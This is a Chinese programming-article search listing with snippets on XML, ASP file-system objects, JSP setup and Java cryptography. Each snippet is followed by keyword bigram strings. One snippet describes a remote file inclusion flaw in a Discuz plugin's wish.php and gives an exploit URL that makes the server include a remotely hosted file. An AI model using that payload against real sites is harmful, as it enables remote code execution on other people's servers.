搜索列表
-
XML入门问答
【XML/RSS】什么是置标语言? ---------------------- 我们日常书写的语言,被称为书面自然语言。如果在书面自然语言中为了标识某些信息,而加入一些标记,这种书面自然语言就可被称为置标语言(英语为:Markup Language)。比如在一段书面语言中,为了说明某一句话的重要,在这句话下面画上底划线。但是,我们在这里解释的置标语言,...
XML入门问答 -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
类似于iis浏览的功能
【ASP编程】<!---将此文件存为folder_list.asp看看效果就知道了加上权限就可以方便自己了,---> <% 'const_domain_name为域名最后不要加斜杠 const const_domain_name="http://localhost" %> <style> b,img,a{font-size:9pt;line-height:150%;text-decoration:none;color:#0000cc;} span{font-...
|类似|似于|于i|ii|is|s浏|浏览|览的|的功|功能|能| -
ASP中FSO对象对IIS WEB服务器数据安全的威胁及对策
【ASP编程】scripting.filesystemobject 对象是由 scrrun.dll 提供的许多供 vbscript/jscript 控制的 com 对象之一。scripting.filesystemobject 提供了非常便利的文本文件和文件目录的访问,但是同时也对 iis web 服务器数据安全造成了一定的威胁。 filefinder 的代码很简单,由3 个函数和 30 行左右的顺序代码构成。 最关键的是 find...
|AS|SP|P中|中F|FS|SO|O对|对象|象对|对I|II|IS|SW|WE|EB|B服|服务|务器|器数|数据|据安|安全|全的|的威|威胁|胁及|及 -
奇妙的文件系统对象组件
【ASP编程】翻译 讨饭猫 很久以前(其实就几个月)就知道 Chinaasp 有个实际效果象黑客的ASE程序,最近 Chinaasp 又提供了精华区全文检索功能。看来文件系统对象组件还是很有用的,对吧?如果你对此有兴趣,可以看看这篇文章。本文属入门级,修行还靠你自己,呵呵。 注意:我们在下文中要操作的是Web服务器的文件系统,所以首先要确定...
|奇妙|妙的|的文|文件|件系|系统|统对|对象|象组|组件|件| -
使用函数自动生成n层目录
【ASP编程】先检查是否已经存在该目录了,如果存在,则不做任何处理,如果不存在则创建。 希望对各位快速开发有用。 CheckFolder.asp <% '*********************************************************************************************************** '作 者: 赵敏 flash90@sohu.com '页面名称: CreateFolder.asp '页面功能...
|使用|用函|函数|数自|自动|动生|生成|成n|n层|层目|目录|录| -
WIN2000+PHP+MYSQL+TOMCAT+JSP完全整合安装手册
【JSP编程】一、前期准备情况1。一个安装好的WIN2000服务器,注意:如果预装了IIS,请先将IIS服务停掉或禁用。2。下栽软件APACHE:版本:1.3.22 ——apache_1.3.22-win32-x86.msiJDK:版本: 1.3 ——j2sdk1_3_0-win.exePHP: 版本: 4.0.4 ——php4.0.4pl1-win32.zipMYSQL:...
|WI|IN|N2|20|00|00|0P|PH|HP|PM|MY|YS|SQ|QL|LT|TO|OM|MC|CA|AT|TJ|JS|SP|P完|完全|全整|整 -
在JSP中处理虚拟路径
【JSP编程】摘要在为服务器端组件编程时,你很可能要从相对于web根的路径来取得某个文件的真实路径,但此文件实际上在站点的一个虚拟路径上。什么是虚拟路径?在一个web服务器上,虚拟路径将物理上分离的各文件组合在一起,放在同一个站点路径上,在应用服务器上,每个应用定位于其自己的虚拟路径上,实际上相互之间有着完美地分离。getR...
|在J|JS|SP|P中|中处|处理|理虚|虚拟|拟路|路径|径| -
指南:想成为一个JSP网站程序员吗?
【JSP编程】任何Web开发人员需要必备的技巧主要有以下这些技术。开发Web应用程序的技术已经变得更成熟、更复杂了。现在,构建一个Web应用程序不仅仅需要简单的HTML技术了。数据库访问、脚本语言和管理都是一个Web程序员需要具备的技术。让我们来看看要成为一个市场上受欢迎的Web开发人员都需要些什么技能吧。自从CERN(欧洲粒...
|指南|南想|想成|成为|为一|一个|个J|JS|SP|P网|网站|站程|程序|序员|员吗|吗?|?| -
Java加密和数字签名编程
【JSP编程】 本文主要谈一下密码学中的加密和数字签名,以及其在java中如何进行使用。对密码学有兴趣的伙伴,推荐看Bruce Schneier的著作:Applied Crypotography。在jdk1.5的发行版本中安全性方面有了很大的改进,也提供了对RSA算法的直接支持,现在我们从实例入手解决问题(本文仅是作为简单介绍): 一、密码学上常用的概...
|Ja|av|va|a加|加密|密和|和数|数字|字签|签名|名编|编程|程| -
了解WEB页面工具语言XML(一)产生背景
【XML/RSS】一、XML产生的背景 XML同HTML一样,都来自Standard Generalized Markup Language, 即标准通用标记语言,简称SGML。早在Web未发明之前,SGML就早已存在。正如它的名称所言,SGML是一种用标记来描述文档资料的通用语言,它包含了一系列的文档类型定义(简称DTD),DTD 中定义了标记的含义,...
|了解|解W|WE|EB|B页|页面|面工|工具|具语|语言|言X|XM|ML|L一|一产|产生|生背|背景|景| -
UDDI FAQs
【XML/RSS】Who, what, when and where -------------------------------------------------------------------------------- 问: 何为UDDI? UDDI代表什么? 答: UDDI(统一描述、发现和集成协议)计划是一个广泛的,开放的行业计划,它使得商业实体能够 (1) 彼此发现,(2) 定义他们怎样在internet上互相作用,并在一个全球的注...
|UD|DD|DI|IF|FA|AQ|Qs|s|
